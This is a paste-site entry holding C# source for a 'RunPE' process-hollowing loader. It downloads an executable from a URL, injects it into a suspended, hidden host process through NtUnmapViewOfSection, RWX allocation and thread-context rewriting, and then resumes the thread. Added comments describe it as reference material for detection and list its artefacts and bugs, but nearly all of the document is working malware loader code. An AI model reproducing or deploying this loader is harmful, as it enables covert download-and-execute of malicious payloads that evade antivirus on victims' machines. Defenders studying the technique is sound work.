setty7

run native in ram

Aug 30th, 2018
  1. using System;
  2. using System.Runtime.InteropServices;
  3.  
  4. namespace AMISS
  5. {
  /// <summary>
  /// Loads a PE image held in a byte buffer into a freshly created, suspended copy of a
  /// host process and resumes the host's primary thread inside that image (the technique
  /// usually called "process hollowing" / "RunPE"). The payload never touches disk, so
  /// what a defender can observe is the API sequence documented on <c>Run</c>, an RWX
  /// region at the payload's preferred base, and a mapped image that no longer matches
  /// the host executable on disk. Kept as reference material for detection and
  /// incident-response work; it is not a general-purpose loader.
  /// </summary>
  6. public static unsafe class CMemoryExecute
  7. {
      /// <summary>
      /// Hand-declared STARTUPINFO for the <c>CreateProcess</c> P/Invoke below.
      /// Only <c>dwFlags</c> and <c>wShowWindow</c> are ever assigned; <c>cb</c>
      /// and the std handles are left at their defaults.
      /// </summary>
  8.  public struct STARTUPINFO
  9.  {
  10.   public uint cb;
  11.   public string lpReserved;
  12.   public string lpDesktop;
  13.   public string lpTitle;
  14.   public uint dwX;
  15.   public uint dwY;
  16.   public uint dwXSize;
  17.   public uint dwYSize;
  18.   public uint dwXCountChars;
  19.   public uint dwYCountChars;
  20.   public uint dwFillAttribute;
  21.   public uint dwFlags;
  22.   public short wShowWindow;
  23.   public short cbReserved2;
  24.   public IntPtr lpReserved2;
  25.   public IntPtr hStdInput;
  26.   public IntPtr hStdOutput;
  27.   public IntPtr hStdError;
  28.  }
  29.  
      /// <summary>
      /// Download-and-execute: fetches <paramref name="link"/> with <c>WebClient</c> and
      /// passes the bytes straight to <see cref="Run"/>. The payload exists only in
      /// memory, so the network request is the only artefact of the retrieval step;
      /// the return value of <c>Run</c> is discarded.
      /// </summary>
      /// <param name="link">URL the payload is downloaded from.</param>
      /// <param name="process">Command line of the host process to hollow.</param>
  30.  public static void NewTask(string link, string process) {
  31.   var webClient = new WebClient();
  32.            byte[] bin = webClient.DownloadData(link);
  33.  
  34.   Run(bin,process);
  35.  }
  36.  
      /// <summary>
      /// Process-hollowing sequence, in the order it is issued (and the order a
      /// user-mode hook, ETW provider or kernel callback will see it):
      ///   1. CreateProcess(hostProcess) with CREATE_SUSPENDED and a hidden window;
      ///   2. NtUnmapViewOfSection at the payload's preferred ImageBase;
      ///   3. VirtualAllocEx(MEM_COMMIT | MEM_RESERVE, PAGE_EXECUTE_READWRITE) at that base;
      ///   4. NtWriteVirtualMemory of the headers, then of every section;
      ///   5. NtGetContextThread / NtSetContextThread on the suspended primary thread;
      ///   6. NtResumeThread.
      /// All structure sizes and field offsets used below are the 32-bit (PE32 / x86
      /// CONTEXT) layouts. Returns false only on the two header sanity checks or on
      /// CreateProcess failure; the status returned by every Nt* call is ignored, and on
      /// no error path is the suspended host process terminated.
      /// </summary>
      /// <param name="exeBuffer">Raw bytes of a PE file. No bounds checks are done
      /// against its length when headers and sections are read.</param>
      /// <param name="hostProcess">Command line of the process to create and hollow.</param>
      /// <param name="optionalArguments">Appended to <paramref name="hostProcess"/>
      /// with a space when non-empty.</param>
      /// <returns>true once the host thread has been resumed; false on the early checks.</returns>
  37.  public static bool Run(byte[] exeBuffer, string hostProcess, string optionalArguments = "")
  38.  {
  39.   // STARTUPINFO: hidden window. STARTF_USESTDHANDLES is set although no handles are filled in.
  40.   STARTUPINFO StartupInfo = new STARTUPINFO();
  41.   StartupInfo.dwFlags = STARTF_USESTDHANDLES|STARTF_USESHOWWINDOW;
  42.   StartupInfo.wShowWindow = SW_HIDE;
  43.  
       // Scratch copies of the PE / thread structures, sized for the 32-bit layouts.
       // PROCESS_INFO doubles as PROCESS_INFORMATION: [0] = hProcess, [1] = hThread.
  44.   var IMAGE_SECTION_HEADER = new byte[0x28]; // pish
  45.   var IMAGE_NT_HEADERS = new byte[0xf8]; // pinh
  46.   var IMAGE_DOS_HEADER = new byte[0x40]; // pidh
  47.   var PROCESS_INFO = new int[0x4]; // pi
  48.   var CONTEXT = new byte[0x2cc]; // ctx
  49.  
       // Raw pointers into the scratch arrays; they are read through the offsets
       // annotated inline below rather than through typed structs.
  50.   byte* pish;
  51.   fixed (byte* p = &IMAGE_SECTION_HEADER[0])
  52.    pish = p;
  53.  
  54.   byte* pinh;
  55.   fixed (byte* p = &IMAGE_NT_HEADERS[0])
  56.    pinh = p;
  57.  
  58.   byte* pidh;
  59.   fixed (byte* p = &IMAGE_DOS_HEADER[0])
  60.    pidh = p;
  61.  
  62.   byte* ctx;
  63.   fixed (byte* p = &CONTEXT[0])
  64.    ctx = p;
  65.  
  66.   // Set the flag: ask NtGetContextThread for the full register set.
  67.   *(uint*)(ctx + 0x0 /* ContextFlags */) = CONTEXT_FULL;
  68.  
  69.   // Get the DOS header of the EXE.
  70.   Buffer.BlockCopy(exeBuffer, 0, IMAGE_DOS_HEADER, 0, IMAGE_DOS_HEADER.Length);
  71.  
  72.   /* Sanity check:  See if we have MZ header. */
  73.   if (*(ushort*)(pidh + 0x0 /* e_magic */) != IMAGE_DOS_SIGNATURE)
  74.    return false;
  75.  
       // e_lfanew is taken from the buffer as-is; nothing checks it against exeBuffer.Length.
  76.   var e_lfanew = *(int*)(pidh + 0x3c);
  77.  
  78.   // Get the NT header of the EXE.
  79.   Buffer.BlockCopy(exeBuffer, e_lfanew, IMAGE_NT_HEADERS, 0, IMAGE_NT_HEADERS.Length);
  80.  
  81.   /* Sanity check: See if we have PE00 header. */
  82.   if (*(uint*)(pinh + 0x0 /* Signature */) != IMAGE_NT_SIGNATURE)
  83.    return false;
  84.  
  85.   // Run with parameters if necessary.
  86.   if (!string.IsNullOrEmpty(optionalArguments))
  87.    hostProcess += " " + optionalArguments;
  88.  
       // Step 1: the host is created suspended so its own image never executes.
       // This is the first observable of the sequence (process creation with CREATE_SUSPENDED).
  89.   if (!CreateProcess(null, hostProcess, IntPtr.Zero, IntPtr.Zero, false, CREATE_SUSPENDED, IntPtr.Zero, null, ref StartupInfo, PROCESS_INFO))
  90.    return false;
  91.  
       // Steps 2-3: preferred ImageBase from the optional header; the host's own image
       // is unmapped there and the range re-allocated as RWX, which is the memory
       // artefact most scanners key on. The VirtualAllocEx result is not used.
  92.   var ImageBase = new IntPtr(*(int*)(pinh + 0x34));
  93.   NtUnmapViewOfSection((IntPtr)PROCESS_INFO[0] /* pi.hProcess */, ImageBase);
  94.   if (VirtualAllocEx((IntPtr)PROCESS_INFO[0] /* pi.hProcess */, ImageBase, *(uint*)(pinh + 0x50 /* SizeOfImage */), MEM_COMMIT | MEM_RESERVE, PAGE_EXECUTE_READWRITE) == IntPtr.Zero)
       // NOTE(review): this retry recurses with the same arguments and no bound, and the
       // suspended host created just above is never terminated - each retry leaves one
       // more suspended process behind, then execution falls through to the writes below anyway.
  95.    Run(exeBuffer, hostProcess, optionalArguments); // Memory allocation failed; try again (this can happen in low memory situations)
  96.  
       // Step 4: headers first, then every section's raw data at base + VirtualAddress.
       // PointerToRawData / SizeOfRawData come straight from the buffer, unchecked.
  97.   fixed (byte* p = &exeBuffer[0])
  98.    NtWriteVirtualMemory((IntPtr)PROCESS_INFO[0] /* pi.hProcess */, ImageBase, (IntPtr)p, *(uint*)(pinh + 84 /* SizeOfHeaders */), IntPtr.Zero);
  99.  
  100.   for (ushort i = 0; i < *(ushort*)(pinh + 0x6 /* NumberOfSections */); i++)
  101.   {
  102.    Buffer.BlockCopy(exeBuffer, e_lfanew + IMAGE_NT_HEADERS.Length + (IMAGE_SECTION_HEADER.Length * i), IMAGE_SECTION_HEADER, 0, IMAGE_SECTION_HEADER.Length);
  103.    fixed (byte* p = &exeBuffer[*(uint*)(pish + 0x14 /* PointerToRawData */)])
  104.     NtWriteVirtualMemory((IntPtr)PROCESS_INFO[0] /* pi.hProcess */, (IntPtr)((int)ImageBase + *(uint*)(pish + 0xc /* VirtualAddress */)), (IntPtr)p, *(uint*)(pish + 0x10 /* SizeOfRawData */), IntPtr.Zero);
  105.   }
  106.  
       // Steps 5-6: read the suspended primary thread's context, write four bytes to the
       // address held in its ecx, point eax at base + AddressOfEntryPoint, write the
       // context back and resume. From here on the host PID is running the payload.
  107.   NtGetContextThread((IntPtr)PROCESS_INFO[1] /* pi.hThread */, (IntPtr)ctx);
  108.   NtWriteVirtualMemory((IntPtr)PROCESS_INFO[0] /* pi.hProcess */, (IntPtr)(*(uint*)(ctx + 0xAC /* ecx */)), ImageBase, 0x4, IntPtr.Zero);
  109.   *(uint*)(ctx + 0xB0 /* eax */) = (uint)ImageBase + *(uint*)(pinh + 0x28 /* AddressOfEntryPoint */);
  110.   NtSetContextThread((IntPtr)PROCESS_INFO[1] /* pi.hThread */, (IntPtr)ctx);
  111.   NtResumeThread((IntPtr)PROCESS_INFO[1] /* pi.hThread */, IntPtr.Zero);
  112.  
  113.  
  114.   return true;
  115.  }
  116.  
  117.  #region WinNT Definitions
  118.  
      // Constants as in WinNT.h / WinBase.h; only the subset used above.
  119.  private const uint CONTEXT_FULL = 0x10007;
  120.  private const int CREATE_SUSPENDED = 0x4;
  121.  private const int MEM_COMMIT = 0x1000;
  122.  private const int MEM_RESERVE = 0x2000;
  123.  private const int PAGE_EXECUTE_READWRITE = 0x40;
  124.  private const ushort IMAGE_DOS_SIGNATURE = 0x5A4D; // MZ
  125.  private const uint IMAGE_NT_SIGNATURE = 0x00004550; // PE00
  126.  
      // SW_SHOW is declared but never referenced; only SW_HIDE is used.
  127.  private static short SW_SHOW = 5;
  128.  private static short SW_HIDE = 0;
  129.  private const uint STARTF_USESTDHANDLES = 0x00000100;
  130.  private const uint STARTF_USESHOWWINDOW = 0x00000001;
  131.  
  132.  
  133.  #region WinAPI
      // PROCESS_INFORMATION is passed as int[4] rather than a struct; see PROCESS_INFO in Run.
  134.  [DllImport("kernel32.dll", SetLastError = true)]
  135.  private static extern bool CreateProcess(string lpApplicationName, string lpCommandLine, IntPtr lpProcessAttributes, IntPtr lpThreadAttributes, bool bInheritHandles, uint dwCreationFlags, IntPtr lpEnvironment, string lpCurrentDirectory, ref STARTUPINFO lpStartupInfo, int[] lpProcessInfo);
  136.  
  137.  [DllImport("kernel32.dll", SetLastError = true)]
  138.  private static extern IntPtr VirtualAllocEx(IntPtr hProcess, IntPtr lpAddress, uint dwSize, uint flAllocationType, uint flProtect);
  139.  
      // The ntdll imports below report failure through their NTSTATUS return value, which
      // no call site in Run inspects; SetLastError has no effect for them.
  140.  [DllImport("ntdll.dll", SetLastError = true)]
  141.  private static extern uint NtUnmapViewOfSection(IntPtr hProcess, IntPtr lpBaseAddress);
  142.  
  143.  [DllImport("ntdll.dll", SetLastError = true)]
  144.  private static extern int NtWriteVirtualMemory(IntPtr hProcess, IntPtr lpBaseAddress, IntPtr lpBuffer, uint nSize, IntPtr lpNumberOfBytesWritten);
  145.  
  146.  [DllImport("ntdll.dll", SetLastError = true)]
  147.  private static extern int NtGetContextThread(IntPtr hThread, IntPtr lpContext);
  148.  
  149.  [DllImport("ntdll.dll", SetLastError = true)]
  150.  private static extern int NtSetContextThread(IntPtr hThread, IntPtr lpContext);
  151.  
  152.  [DllImport("ntdll.dll", SetLastError = true)]
  153.  private static extern uint NtResumeThread(IntPtr hThread, IntPtr SuspendCount);
  154.  #endregion
  155.  
  156.  #endregion
  157. }
  158. }